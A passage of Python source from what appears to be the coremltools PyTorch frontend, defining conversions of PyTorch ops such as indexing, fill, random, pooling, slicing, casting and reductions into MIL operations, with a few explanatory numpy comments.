enumerate(valid_indices):\n if (index.shape != broadcasted_shape) and index.val is not None:\n new_val = _np.broadcast_to(index.val, broadcasted_shape)\n valid_indices[i] = mb.const(\n val=new_val, name=index.name + \"_broadcasted\"\n )\n valid_indices = [mb.cast(x=index, dtype=\"int32\") for index in valid_indices]\n\n # First stack the index together\n indices_rank = valid_indices[0].rank\n indices = mb.stack(values=valid_indices, axis=indices_rank)\n\n # transpose the input tensor to gather the slicing index in front\n is_connected = True\n for i in range(1, len(indices_axes)):\n if indices_axes[i] != indices_axes[i - 1] + 1:\n is_connected = False\n break\n\n name = node.name + \"_transpose\" if is_connected else node.name\n perm = indices_axes + [axis for axis in range(x.rank) if axis not in indices_axes]\n x = mb.transpose(x=x, perm=perm)\n\n if is_current_opset_version_compatible_with(target.iOS17):\n # IOS17 `gather_nd` behaviour is undefined for negative indices.\n cond = mb.greater_equal(x=indices, y=0)\n x_shape = mb.shape(x=x)\n indices_shape = mb.shape(x=indices)\n indices_last_dim = value_at(indices_shape, indices.rank - 1)\n indices_last_dim_expand = mb.expand_dims(x=indices_last_dim, axes=[0])\n slice_shape = mb.slice_by_size(x=x_shape, begin=[0], size=indices_last_dim_expand)\n indices = mb.select(\n cond=cond,\n a=indices,\n b=mb.add(x=indices, y=slice_shape),\n )\n x = mb.gather_nd(x=x, indices=indices, name=name)\n\n # if the index axes are connected, we need to transpose the result back\n if is_connected:\n new_dimensions = list(range(indices_axes[0], indices_axes[0] + indices_rank))\n new_perm = new_dimensions + [\n axis\n for axis in range(rank + indices_rank - len(indices_axes))\n if axis not in new_dimensions\n ]\n perm_back = [new_perm.index(axis) for axis in range(len(new_perm))]\n x = mb.transpose(x=x, perm=perm_back, name=node.name)\n context.add(x)\n\n\n@register_torch_op\ndef ones(context, node):\n inputs = _get_inputs(context, node, expected=[5, 6])\n size = inputs[0]\n # dtype = NUM_TO_TORCH_DTYPE[inputs[1].val] unused\n # layout = inputs[2] unused\n # device = inputs[3] unused\n # requires_grad = inputs[4] unused\n # out = inputs[5] unused\n if isinstance(size, list):\n size = mb.concat(values=size, axis=0)\n fill = mb.fill(shape=size, value=1.0, name=node.name)\n context.add(fill)\n\n\n@register_torch_op\ndef ones_like(context, node):\n inputs = _get_inputs(context, node, expected=6)\n x = inputs[0]\n if is_current_opset_version_compatible_with(target.iOS16):\n fill = mb.fill_like(ref_tensor=x, value=1.0, name=node.name)\n else:\n size = mb.shape(x=x)\n # dtype = NUM_TO_TORCH_DTYPE[inputs[1].val] unused\n # layout = inputs[2] unused\n # device = inputs[3] unused\n # requires_grad = inputs[4] unused\n # out = inputs[5] unused\n fill = mb.fill(shape=size, value=1.0, name=node.name)\n context.add(fill)\n\n\ndef _make_fill_op(size, val, name):\n assert val is not None\n if isinstance(size, list):\n size = mb.concat(values=size, axis=0)\n if types.is_float(size.dtype):\n size = mb.cast(x=size, dtype=\"int32\")\n fill = mb.fill(shape=size, value=val, name=name)\n return fill\n\n\n@register_torch_op\ndef full(context, node):\n inputs = _get_inputs(context, node)\n size = inputs[0]\n val = inputs[1].val\n result = _make_fill_op(size, val, node.name)\n context.add(result)\n\n\n@register_torch_op\ndef full_like(context, node):\n inputs = _get_inputs(context, node, expected=7)\n x = inputs[0]\n val = inputs[1].val\n if is_current_opset_version_compatible_with(target.iOS16):\n 
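# --- Editor's note: illustrative sketch, not part of the original coremltools source. ---\n # The iOS17 branches above (in `index_put` and `index`) normalize negative indices before\n # `gather`/`gather_nd`/`scatter_nd`, whose behaviour is undefined for negative indices on iOS17.\n # The select(idx >= 0, idx, idx + dim_size) pattern matches this plain-numpy computation\n # (hypothetical values, for illustration only):\n # import numpy as np\n # idx, dim_size = np.array([0, -1, 2, -3]), 4\n # np.where(idx >= 0, idx, idx + dim_size) # -> array([0, 3, 2, 1])\n 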
result = mb.fill_like(ref_tensor=x, value=val, name=node.name)\n else:\n size = mb.shape(x=inputs[0])\n result = _make_fill_op(size, val, node.name)\n context.add(result)\n\n\n@register_torch_op\ndef new_full(context, node):\n # The difference between \"new_full\" and \"full\" is that the \"new_full\" is called from\n # an existing tensor: tensor.new_full(size, fill_value), while the \"full\" is called\n # from the torch API: torch.full(size, fill_value).\n # But they are basically doing the same thing.\n inputs = _get_inputs(context, node)\n size = inputs[1]\n val = inputs[2].val\n result = _make_fill_op(size, val, node.name)\n context.add(result)\n\n@register_torch_op\ndef randint(context, node):\n inputs = _get_inputs(context, node, expected=(7, 8))\n low = mb.cast(x=inputs[0], dtype=\"fp32\")\n high = mb.cast(x=inputs[1], dtype=\"fp32\")\n shape = inputs[2]\n rand_uniform = mb.random_uniform(shape=shape, low=low, high=high)\n rand_int = mb.cast(x=rand_uniform, dtype=\"int32\", name=node.name)\n context.add(rand_int)\n\n@register_torch_op\ndef rand(context, node):\n shape, _, dtype, _, _ = _get_inputs(context, node)\n dtype = NUM_TO_DTYPE_STRING[TORCH_DTYPE_TO_NUM[dtype.val]] if dtype else \"fp32\"\n low, high = mb.cast(x=0.0, dtype=dtype), mb.cast(x=1.0, dtype=dtype)\n rand_uniform = mb.random_uniform(shape=shape, low=low, high=high)\n context.add(rand_uniform, node.name)\n\n@register_torch_op\ndef randn(context, node):\n inputs = _get_inputs(context, node, expected=[5, 6])\n shape = inputs[0]\n rand_normal = mb.random_normal(shape=shape)\n rand_fp32 = mb.cast(x=rand_normal, dtype=\"fp32\", name=node.name)\n context.add(rand_fp32)\n\n@register_torch_op\ndef randn_like(context, node):\n inputs = _get_inputs(context, node, expected=6)\n x = inputs[0]\n shape = mb.shape(x=x)\n rand_normal = mb.random_normal(shape=shape)\n rand_fp32 = mb.cast(x=rand_normal, dtype=\"fp32\", name=node.name)\n context.add(rand_fp32)\n\n@register_torch_op\ndef bitwise_not(context, node):\n inputs = _get_inputs(context, node)\n x = inputs[0]\n dtype = x.dtype\n if types.is_int(dtype):\n x = mb.add(x=x, y=1)\n x = mb.mul(x=x, y=-1, name=node.name)\n elif types.is_bool(dtype):\n x = mb.logical_not(x=x, name=node.name)\n else:\n raise ValueError(\"Not supported type {} found for 'bitwise_not' op\".format(dtype))\n context.add(x)\n\n\n@register_torch_op(torch_alias=[\"and\"])\ndef bitwise_and(context, node):\n inputs = _get_inputs(context, node)\n\n input_dtypes = [i.dtype for i in inputs]\n if all(types.is_bool(input_dtype) for input_dtype in input_dtypes):\n logical_and(context, node)\n else:\n raise NotImplementedError(\n f\"The `bitwise_and` op only supports boolean input, but get {input_dtypes}.\"\n )\n\n\n@register_torch_op\ndef logical_not(context, node):\n # There is an optional `out` parameter in torch.logical_not.\n inputs = _get_inputs(context, node, expected=[1, 2])\n x = inputs[0]\n if not types.is_bool(x.dtype):\n x = mb.cast(x=x, dtype=\"bool\")\n res = mb.logical_not(x=x, name=node.name)\n context.add(res)\n\n\ndef _avg_pool(context, node, inputs):\n x = inputs[0]\n kernel_sizes = inputs[1]\n strides = inputs[2]\n if strides.op.op_type == \"const\" and (not list(strides.val)):\n strides = mb.const(val=kernel_sizes.val, name=strides.name)\n pad_type = \"custom\"\n # Need to explicitly state L-R, T-B pad\n pad = inputs[3]\n pad = _np.repeat(pad.val, 2)\n ceil_mode = inputs[4].val\n include_pad = inputs[5].val\n\n spatial_rank = len(pad) // 2\n if spatial_rank > 2 and ceil_mode is True and 
list(strides.val) != [1] * len(strides.val):\n # since MIL does not support ceil_mode for 3D pool,\n # need to adjust padding values if ceil_mode is True\n # ceil_mode only causes any difference though, if the strides are not 1\n x_spatial_dimensions = x.shape[-spatial_rank:]\n new_pad = _adjust_pad_for_ceil_mode(\n x_spatial_dimensions, kernel_sizes.val, strides.val, pad\n )\n if _np.sum(_np.abs(new_pad - pad)) > 1e-3:\n if include_pad:\n raise ValueError('pool3D with ceil mode=True and include_pad=True not supported')\n pad = new_pad\n\n pool = mb.avg_pool(\n x=x,\n kernel_sizes=kernel_sizes,\n strides=strides,\n pad_type=pad_type,\n pad=pad,\n name=node.name,\n exclude_padding_from_average=not include_pad,\n ceil_mode=ceil_mode if spatial_rank <= 2 else False,\n )\n context.add(pool)\n\n\n@register_torch_op\ndef avg_pool1d(context, node):\n inputs = _get_inputs(context, node, expected=6)\n _avg_pool(context, node, inputs)\n\n\n@register_torch_op\ndef avg_pool2d(context, node):\n inputs = _get_inputs(context, node, min_expected=6)\n divisor_override = None if len(inputs) < 7 else inputs[6]\n if divisor_override is not None:\n raise ValueError(\"divisor_override is not supported for avg_pool2d\")\n _avg_pool(context, node, inputs)\n\n\n@register_torch_op\ndef avg_pool3d(context, node):\n inputs = _get_inputs(context, node, expected=7)\n divisor_override = inputs[6]\n if divisor_override is not None:\n raise ValueError(\"divisor_override is not supported for avg_pool3d\")\n _avg_pool(context, node, inputs)\n\n\n@register_torch_op(torch_alias=[\"_log_softmax\"])\ndef log_softmax(context, node):\n inputs = _get_inputs(context, node)\n\n x = inputs[0]\n axis = inputs[1]\n\n # input 2 is either out or half_to_float, so we ignore\n ignored = inputs[2]\n assert ignored is None or ignored.dtype == types.bool\n\n res = mb.softmax(x=x, axis=axis, name=node.name + \"_softmax\")\n res = mb.log(x=res, name=node.name)\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"nll_loss_nd\"])\ndef nll_loss(context, node):\n inputs = _get_inputs(context, node, expected=5)\n\n x = inputs[0]\n target = inputs[1]\n weight = inputs[2]\n reduction = inputs[3]\n ignore_index = inputs[4]\n\n # mapping for reduction\n reduction_mapping = {0: \"none\", 1: \"mean\", 2: \"sum\"}\n reduction = reduction_mapping[reduction.val]\n\n # compute the weights loss\n batch_size = x.shape[0]\n class_num = x.shape[1]\n\n # only support weight and ignore_index both None\n if weight is not None:\n raise NotImplementedError(\"Only unity weight is supported for NLLLoss.\")\n if ignore_index.val != -100:\n raise NotImplementedError(\"ignore index not supported for NLLLoss.\")\n\n x = mb.cast(x=x, dtype=\"fp32\")\n x = mb.mul(x=x, y=-1.)\n\n target = mb.cast(x=target, dtype=\"int32\")\n labels = mb.one_hot(indices=target, one_hot_vector_size=class_num)\n labels = mb.cast(x=labels, dtype=\"fp32\")\n loss = mb.mul(x=x, y=labels)\n loss = mb.reduce_sum(x=loss, axes=[1])\n\n # reduction type\n if reduction == \"none\":\n out = mb.identity(x=loss, name=node.name)\n elif reduction == \"sum\":\n out = mb.reduce_sum(x=loss, axes=[0], keep_dims=False, name=node.name)\n elif reduction == \"mean\":\n out = mb.real_div(x=loss, y=_np.float32(batch_size))\n out = mb.reduce_sum(x=out, axes=[0], keep_dims=False, name=node.name)\n else:\n raise NotImplementedError(\"Unsupported reduction type for NLLLoss.\")\n\n context.add(out)\n\n\n@register_torch_op\ndef sigmoid(context, node):\n inputs = _get_inputs(context, node, expected=1)\n\n res = 
mb.sigmoid(x=inputs[0], name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef hardsigmoid(context, node):\n inputs = _get_inputs(context, node, expected=1)\n\n res = mb.sigmoid_hard(x=inputs[0], alpha=1.0 / 6, beta=0.5, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef gelu(context, node):\n inputs = _get_inputs(context, node)\n assert len(inputs) in (1, 2)\n mode = None\n if len(inputs) == 2:\n approximate = inputs[1].val\n if approximate == \"tanh\":\n mode = \"TANH_APPROXIMATION\"\n else:\n assert approximate == \"none\"\n res = mb.gelu(x=inputs[0], mode=mode, name=node.name)\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"slice\"])\ndef _slice(context, node):\n inputs = _get_inputs(context, node, expected=5)\n x = inputs[0]\n dim = inputs[1].val\n\n if inputs[2] and inputs[2].val is not None:\n start = inputs[2].val\n elif isinstance(inputs[2], Var):\n start = inputs[2]\n else:\n start = 0\n\n if inputs[3] and inputs[3].val is not None:\n end = inputs[3].val\n elif isinstance(inputs[3], Var):\n end = inputs[3]\n else:\n end = None\n\n step = inputs[4].val\n\n if start == 0 and end is None and step == 1:\n # Handling x[:], just pass through the tensor.\n context.add(x, node.name)\n return\n\n begin_array = [0] * len(x.shape)\n begin_array[dim] = start\n end_array = [s if isinstance(s, int) else 0 for s in x.shape]\n end_mask = [True] * len(x.shape)\n if end is not None:\n end_array[dim] = end\n end_mask[dim] = False\n\n if isinstance(start, Var):\n begin_array = mb.concat(values=begin_array, axis=0)\n\n if isinstance(end, Var):\n end_array = mb.concat(values=end_array, axis=0)\n\n kwargs = {\n \"x\": x,\n \"begin\": begin_array,\n \"end\": end_array,\n \"end_mask\": end_mask,\n \"name\": node.name,\n }\n\n if step != 1:\n stride_array = _np.array([1] * len(x.shape))\n stride_array[dim] = step\n kwargs[\"stride\"] = stride_array\n\n res = mb.slice_by_index(**kwargs)\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"split_with_sizes\"])\ndef split(context, node):\n inputs = _get_inputs(context, node, expected=3)\n x = inputs[0]\n split_sizes = inputs[1]\n dim = inputs[2].val\n\n if not isinstance(split_sizes.val, _np.ndarray):\n shape = mb.shape(x=x)\n dim_size = _list_select(shape, dim)\n # MIL split op needs the size of each split to be given explicitly.\n num_whole_splits = mb.floor_div(x=dim_size, y=split_sizes)\n remainder = mb.mod(x=dim_size, y=split_sizes)\n\n # MIL doesn't have a way of turning a scalar into a tensor (list write\n # only supports tensors). 
As a workaround, we create a constant [1]\n # tensor and multiply it by the scalar value, thus creating a tensor\n # with the scalar value in it.\n tmp = mb.const(val=[1])\n whole_sizes = mb.mul(x=tmp, y=split_sizes)\n reps = mb.mul(x=tmp, y=num_whole_splits)\n whole_sizes = mb.tile(x=whole_sizes, reps=reps)\n if remainder.val == 0:\n split_sizes = whole_sizes\n else:\n partial_size = mb.mul(x=tmp, y=remainder)\n split_sizes = mb.concat(values=[whole_sizes, partial_size], axis=0)\n res = mb.split(x=x, split_sizes=split_sizes, axis=dim, name=node.name)\n context.add(res, torch_name=node.name)\n\n\n@register_torch_op\ndef unbind(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x = inputs[0]\n dim = inputs[1].val\n split_sizes = [1] * x.shape[dim]\n if len(split_sizes) == 1:\n res = [mb.squeeze(x=x, axes=[dim])]\n else:\n res = mb.split(x=x, split_sizes=split_sizes, axis=dim, name=node.name)\n res = [mb.squeeze(x=x, axes=[dim]) for x in res]\n context.add(res, torch_name=node.name)\n\n\n@register_torch_op(torch_alias = [\"_to_copy\"])\ndef to(context, node):\n inputs = _get_inputs(context, node)\n\n # There are a lot of variants of `to` op.\n # - When len(inputs) is 7 or 8, we only care about the first two params (input and dtype).\n # - When len(inputs) == 6, the parameter is (input, _, dtype, non_blocking, copy, memory_format)\n # - When len(inputs) == 5, the parameter is (input, dtype, non_blocking, copy, memory_format)\n # - When len(inputs) == 4, the parameter is (input, dtype, non_blocking, copy)\n # - When len(inputs) == 3, the parameter is (input, non_blocking, copy)\n # We only use `input` and `dtype`, and `non_blocking` and `copy` are unused.\n _input = inputs[0]\n\n target_dtype: Optional[Var]\n inputs_len = len(inputs)\n if inputs_len in (4, 5, 7, 8):\n target_dtype = inputs[1]\n elif inputs_len == 6:\n target_dtype = inputs[2]\n elif inputs_len <= 3:\n target_dtype = None\n else:\n raise ValueError(\n \"Received invalid arguments for PyTorch conversion of op {}\".format(node)\n )\n\n if target_dtype is None:\n # When target_dtype is None, it means the input's dtype is already the target dtype.\n context.add(_input, torch_name=node.name)\n return\n elif types.is_scalar(target_dtype.sym_type) and target_dtype.val is not None:\n dtype = target_dtype.val\n else:\n # When the val of dtype is not available, bridge from the np dtype.\n np_type = nptype_from_builtin(target_dtype.dtype)\n dtype = NUMPY_DTYPE_TO_TORCH_NUM[np_type]\n\n torch_dtype = NUM_TO_TORCH_DTYPE[dtype]\n if isinstance(_input, Var) and _input.can_be_folded_to_const():\n # numpy -> torch -> torch cast -> numpy\n # This path is needed to use the mapping of passed in dtypes to torch dtypes.\n casted_input = torch.tensor(_input.val).type(torch_dtype).cpu().numpy()\n res = mb.const(val=casted_input, name=node.name)\n else:\n if dtype in NUM_TO_DTYPE_STRING:\n res = mb.cast(x=_input, dtype=NUM_TO_DTYPE_STRING[dtype], name=node.name)\n else:\n # For dtype that is not supported by mb.cast, we do it in best-effort to cast it to int\n # or float based on the dtype.\n np_dtype = NUM_TO_NUMPY_DTYPE[dtype]\n if _np.issubdtype(np_dtype, _np.integer):\n res = mb.cast(x=_input, dtype=\"int32\", name=node.name)\n elif _np.issubdtype(np_dtype, _np.floating):\n res = mb.cast(x=_input, dtype=\"fp32\", name=node.name)\n else:\n raise ValueError(f\"Unsupported op {node} with target dtype {np_dtype}\")\n context.add(res)\n\n\n@register_torch_op\ndef erf(context, node):\n inputs = _get_inputs(context, node, expected=1)\n 
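# --- Editor's note: illustrative sketch, not part of the original coremltools source. ---\n # The constant-[1] workaround in `split` above (turning a scalar into a rank-1 tensor so that\n # `tile` can repeat it) mirrors this plain-numpy computation (hypothetical values, illustration only):\n # import numpy as np\n # split_size, num_whole_splits, remainder = 3, 2, 1 # e.g. dim_size 7 split into chunks of 3\n # whole_sizes = np.tile(np.array([1]) * split_size, num_whole_splits) # -> array([3, 3])\n # split_sizes = np.concatenate([whole_sizes, np.array([1]) * remainder]) # -> array([3, 3, 1])\n 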
_input = inputs[0]\n erf = mb.erf(x=_input, name=node.name)\n context.add(erf)\n\n\n@register_torch_op(torch_alias=[\"scalarimplicit\"])\ndef implicittensortonum(context, node):\n inputs = _get_inputs(context, node, expected=1)\n _input = inputs[0]\n\n if _input.shape == (): # already a scalar\n context.add(_input, node.name)\n else:\n assert _input.shape == (1,)\n # shape: (1,) -> ()\n squeeze = mb.squeeze(x=_input, name=node.name)\n context.add(squeeze)\n\n\n@register_torch_op\ndef constantchunk(context, node):\n inputs = _get_inputs(context, node, expected=1)\n x = inputs[0]\n # ConstantChunk gets its parameters as attributes of the node.\n chunks = node.attr[\"chunks\"]\n dim = node.attr[\"dim\"]\n\n total = x.shape[dim]\n size = int(_math.ceil(float(total) / float(chunks)))\n split_sizes = [size] * int(_math.floor(total / size))\n remainder = total - sum(split_sizes)\n if remainder > 0:\n split_sizes.append(remainder)\n\n res = mb.split(x=x, split_sizes=split_sizes, axis=dim, name=node.name)\n for val, name in zip(res, node.outputs):\n context.add(val, name)\n\n\ndef _broadcast(name, tensor, shape):\n if len(shape) > tensor.rank:\n new_dims = len(shape) - tensor.rank\n tensor = mb.expand_dims(x=tensor, axes=list(range(new_dims)))\n\n reps = []\n for ts, ds in zip(tensor.shape, shape):\n if not is_symbolic(ts) and not is_symbolic(ds) and ds > 0 and ts == 1:\n reps.append(ds)\n else:\n reps.append(1)\n\n res = mb.tile(x=tensor, reps=reps, name=name)\n return res\n\n\n@register_torch_op(torch_alias=[\"expand_copy\"])\ndef expand(context, node):\n def _broadcast_dynamic(name, tensor, shape):\n # Add any extra dimensions\n if len(shape) > tensor.rank:\n new_dims = len(shape) - tensor.rank\n tensor = mb.expand_dims(x=tensor, axes=list(range(new_dims)))\n\n tensor_shape = mb.shape(x=tensor)\n shape = mb.concat(values=shape, axis=0)\n reps = mb.real_div(x=shape, y=tensor_shape)\n reps = mb.cast(x=reps, dtype=\"int32\")\n res = mb.tile(x=tensor, reps=reps, name=name)\n return res\n\n\n # PyTorch 1.6+ has 3 inputs while older version has 2\n inputs = _get_inputs(context, node, expected=[2, 3])\n\n x = inputs[0]\n shape = inputs[1]\n\n if isinstance(shape, list):\n res = _broadcast_dynamic(node.name, x, shape)\n else:\n res = _broadcast(node.name, x, shape.val)\n context.add(res)\n\n\n@register_torch_op\ndef expand_as(context, node):\n # PyTorch 1.6+ has 3 inputs while older version has 2\n inputs = _get_inputs(context, node, expected=[2, 3])\n x = inputs[0]\n other = inputs[1]\n\n res = _broadcast(node.name, x, other.shape)\n context.add(res)\n\n\n@register_torch_op\ndef arange(context, node):\n inputs = _get_inputs(context, node)\n # dtype = inputs[-4]\n # layout = inputs[-3]\n # device = inputs[-2]\n # pin_memory = inputs[-1]\n if len(inputs) == 5:\n # inputs are [end, dtype, layout, device, pin_memory]\n start = 0\n end = inputs[0]\n step = 1\n elif len(inputs) == 6:\n # inputs are [start, end, dtype, layout, device, pin_memory]\n start = inputs[0]\n end = inputs[1]\n step = 1\n elif len(inputs) == 7:\n # inputs are [start, end, step, dtype, layout, device, pin_memory]\n start = inputs[0]\n end = inputs[1]\n step = inputs[2]\n else:\n raise ValueError(\n \"arange must have exactly 5, 6, or 7 inputs, got {}\".format(len(inputs))\n )\n # If start, end, and step don't have the same dtype, we cast them to fp32\n int_start = isinstance(start, int) or types.is_int(start.dtype)\n int_end = isinstance(end, int) or types.is_int(end.dtype)\n int_step = isinstance(step, int) or 
types.is_int(step.dtype)\n\n if int_start != int_end or int_start != int_step:\n start = mb.cast(x=start, dtype=\"fp32\")\n end = mb.cast(x=end, dtype=\"fp32\")\n step = mb.cast(x=step, dtype=\"fp32\")\n res = mb.range_1d(start=start, end=end, step=step, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef masked_fill(context, node):\n inputs = _get_inputs(context, node, expected=3)\n x = inputs[0]\n mask = inputs[1]\n value = inputs[2]\n\n if not types.is_bool(mask.dtype):\n # cond must be bool type\n mask = mb.cast(x=mask, dtype=\"bool\")\n\n if value.dtype != x.dtype:\n value = mb.cast(x=value, dtype=builtin_to_string(x.dtype))\n\n value, x = promote_input_dtypes([value, x])\n res = mb.select(cond=mask, a=value, b=x, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef meshgrid(context, node):\n \"\"\"\n For N input tensors, a meshgrid is constructed by viewing each tensor as an N-dimensional tensor\n with values in the dimension corresponding to its order in the args. (a.)\n Then, it is expanded along dimensions corresponding to the dimensions of each\n 1d tensor in the order that they were passed in. (b.)\n\n Each output tensor is put into a tuple that is returned. These tuples form\n N N-dimensional grids, where the ith grid is defined as expanding the ith input over\n dimensions defined by the other inputs.\n \"\"\"\n supported_indexing_modes = (\"ij\", \"xy\")\n indexing = \"ij\"\n inputs = _get_inputs(context, node, expected=[1, 2])\n\n if len(inputs) == 2:\n indexing = inputs[1].val\n if indexing not in supported_indexing_modes:\n raise ValueError(\"indexing mode {} not supported\".format(indexing))\n\n tensor_inputs = inputs[0]\n assert isinstance(tensor_inputs, (list, tuple))\n if len(tensor_inputs) < 2:\n raise ValueError(\"Requires >= 2 tensor inputs.\")\n\n if any([len(tensor_var.shape) > 1 for tensor_var in tensor_inputs]):\n raise ValueError(\"meshgrid received non-1d tensor.\")\n\n dim_tuple = tuple(tensor_var.shape[0] for tensor_var in tensor_inputs)\n\n grids = []\n size = len(tensor_inputs)\n for i in range(size):\n view_shape = [1] * size\n view_shape[i] = -1\n view_shape = tuple(view_shape)\n # (a.) in docstring\n view = mb.reshape(\n x=tensor_inputs[i], shape=view_shape, name=node.name + \"_view_\" + str(i)\n )\n\n # (b.) 
in docstring\n reps = [\n ds if ds > 0 and ts == 1 else 1 for ts, ds in zip(view.shape, dim_tuple)\n ]\n res = mb.tile(x=view, reps=reps, name=node.name + \"_expand_\" + str(i))\n\n # transpose the first two dimensions for \"xy\" indexing\n if indexing == \"xy\":\n perm = [1, 0] + list(range(2, size))\n res = mb.transpose(x=res, perm=perm, name=node.name + \"_transpose_\" + str(i))\n\n grids.append(res)\n\n context.add(tuple(grids), node.name)\n\n\n# Defines all the nodes that are noOps\n@register_torch_op(\n torch_alias=[\n \"clone\",\n \"contiguous\",\n \"detach\",\n \"device\",\n \"dropout\",\n \"feature_dropout\",\n \"lift_fresh\",\n ]\n)\ndef noop(context, node):\n logger.info(\"Setting pytorch op: {} to no-op.\".format(node))\n inputs = _get_inputs(context, node)\n _input = inputs[0]\n context.add(_input, torch_name=node.name)\n\n\n@register_torch_op\ndef argmax(context, node):\n inputs = _get_inputs(context, node)\n x = inputs[0]\n axis = inputs[1]\n keep_dims = inputs[2]\n if types.is_int(x.dtype) and x.dtype._width == 64:\n # MIL reduce_argmax doesn't support int64.\n x = mb.cast(x=x, dtype=\"int32\")\n res = mb.reduce_argmax(x=x, axis=axis, keep_dims=keep_dims, name=node.name)\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"empty_like\"])\ndef zeros_like(context, node):\n inputs = _get_inputs(context, node, expected=6)\n x = inputs[0]\n shape = mb.shape(x=x)\n if inputs[1] and inputs[1].val:\n dtype = inputs[1].val\n np_type = NUM_TO_NUMPY_DTYPE[dtype]\n else:\n np_type = nptype_from_builtin(x.dtype)\n\n if shape.can_be_folded_to_const():\n shape = shape.val\n zeros = _np.zeros(shape).astype(np_type)\n zeros_like = mb.const(val=zeros, name=node.name)\n else:\n value = np_type(0)\n if is_current_opset_version_compatible_with(target.iOS16):\n zeros_like = mb.fill_like(ref_tensor=x, value=value, name=node.name)\n else:\n zeros_like = mb.fill(shape=shape, value=value, name=node.name)\n\n context.add(zeros_like)\n\n\n@register_torch_op(torch_alias=[\"empty\"])\ndef zeros(context, node):\n inputs = _get_inputs(context, node)\n size = inputs[0]\n if inputs[1] is not None:\n dtype = inputs[1].val\n else:\n dtype = torch.get_default_dtype()\n assert dtype in (torch.float32, torch.float64)\n dtype = 6\n\n if isinstance(size, list) or not size.can_be_folded_to_const():\n # the size is dynamic or this zeros op cannot be folded into const.\n size = mb.concat(values=size, axis=0) if isinstance(size, list) else size\n np_type = NUM_TO_NUMPY_DTYPE[dtype]\n zeros = mb.fill(shape=size, value=np_type(0), name=node.name)\n else:\n # the size is static and this zeros op can be folded into const.\n size = size.val\n # layout = inputs[2] unused\n # device = inputs[3] unused\n # pin_memory = inputs[4] unused\n torch_dtype = NUM_TO_TORCH_DTYPE[dtype]\n zeros_array = torch.zeros(tuple(size)).type(torch_dtype).numpy()\n zeros = mb.const(val=zeros_array, name=node.name)\n\n context.add(zeros)\n\n\n@register_torch_op(torch_alias=[\"new_empty\"])\ndef new_zeros(context, node):\n inputs = _get_inputs(context, node)\n shape = inputs[1]\n if isinstance(shape, list):\n # when the size is dynamic, it is a list of pymil scalar,\n # we need to concat them first to get a shape.\n shape = mb.concat(values=shape, axis=0)\n context.add(mb.fill(shape=shape, value=0., name=node.name))\n\n\n@register_torch_op\ndef dim(context, node):\n inputs = _get_inputs(context, node)\n shape = mb.shape(x=inputs[0])\n rank = mb.shape(x=shape)\n context.add(value_at(rank, 0, node.name))\n\n\n@register_torch_op\ndef min(context, 
node):\n inputs = _get_inputs(context, node, expected=[1, 2, 3])\n\n # mimic functionality from https://pytorch.org/docs/stable/generated/torch.min.html\n if len(inputs) == 1:\n value = mb.reduce_min(x=inputs[0], axes=None, name=node.name)\n context.add(value)\n elif len(inputs) == 2:\n value = mb.minimum(x=inputs[0], y=inputs[1], name=node.name)\n context.add(value)\n elif len(inputs) == 3:\n _input = inputs[0]\n dim = inputs[1].val\n keepdim = inputs[2].val\n\n values = mb.reduce_min(x=_input, axes=[dim], keep_dims=keepdim)\n indices = mb.reduce_argmin(x=_input, axis=dim, keep_dims=keepdim)\n assert len(node.outputs) == 2\n values_name = node.outputs[0]\n indices_name = node.outputs[1]\n context.add(values, torch_name=values_name)\n context.add(indices, torch_name=indices_name)\n\n\n@register_torch_op\ndef max(context, node):\n inputs = _get_inputs(context, node, expected=[1, 2, 3])\n\n # mimic functionality from https://pytorch.org/docs/stable/generated/torch.max.html\n if len(inputs) == 1:\n value = mb.reduce_max(x=inputs[0], axes=None, name=node.name)\n context.add(value)\n elif len(inputs) == 2:\n value = mb.maximum(x=inputs[0], y=inputs[1], name=node.name)\n context.add(value)\n elif len(inputs) == 3:\n _input = inputs[0]\n dim = inputs[1].val\n keepdim = inputs[2].val\n\n values = mb.reduce_max(x=_input, axes=[dim], keep_dims=keepdim)\n indices = mb.reduce_argmax(x=_input, axis=dim, keep_dims=keepdim)\n assert len(node.outputs) == 2\n values_name = node.outputs[0]\n indices_name = node.outputs[1]\n context.add(values, torch_name=values_name)\n context.add(indices, torch_name=indices_name)\n\ndef _add_amax_amin(context, node, reduce_op):\n # mimic functionality from https://pytorch.org/docs/stable/generated/torch.amax.html\n # mimic functionality from https://pytorch.org/docs/stable/generated/torch.amin.html\n assert len(node.outputs) == 1\n\n all_inputs = _get_inputs(context, node, expected=[2, 3])\n _input = all_inputs[0]\n dim = [all_inputs[1].val] if isinstance(all_inputs[1].val, int) else [x for x in all_inputs[1].val]\n keepdim = all_inputs[2] if len(all_inputs) == 3 else False\n\n context.add(reduce_op(x=_input, axes=dim, keep_dims=keepdim), torch_name=node.outputs[0])\n\n@register_torch_op\ndef amax(context, node):\n _add_amax_amin(context, node, mb.reduce_max)\n\n@register_torch_op\ndef amin(context, node):\n _add_amax_amin(context, node, mb.reduce_min)\n\n\n@register_torch_op\ndef argsort(context, node):\n inputs = _get_inputs(context, node, expected=3)\n ascending = mb.logical_not(x=inputs[2])\n argsort = mb.argsort(x=inputs[0], axis=inputs[1], ascending=ascending, name=node.name)\n context.add(argsort)\n\n\n@register_torch_op\ndef sort(context, node):\n inputs = _get_inputs(context, node)\n _input = inputs[0]\n axis = inputs[1].val\n ascending = not inputs[2].val\n indices_name = node.outputs[1]\n values_name = node.outputs[0]\n indices = mb.argsort(x=_input, axis=axis, ascending=ascending, name=indices_name)\n values = mb.gather_along_axis(x=_input, indices=indices, axis=axis, name=values_name)\n context.add(values, torch_name=values_name)\n context.add(indices, torch_name=indices_name)\n\n\n@register_torch_op\ndef append(context, node):\n # Note: by applying torchir_passes.transform_inplace_ops the meaning of\n # this op is changed from the original TorchIR. This op expects a python\n # list or MIL List as its first input. If an MIL List, the second input\n # must be a tensor of whatever shape the List expects. If not an MIL List,\n # the second input can be anything. 
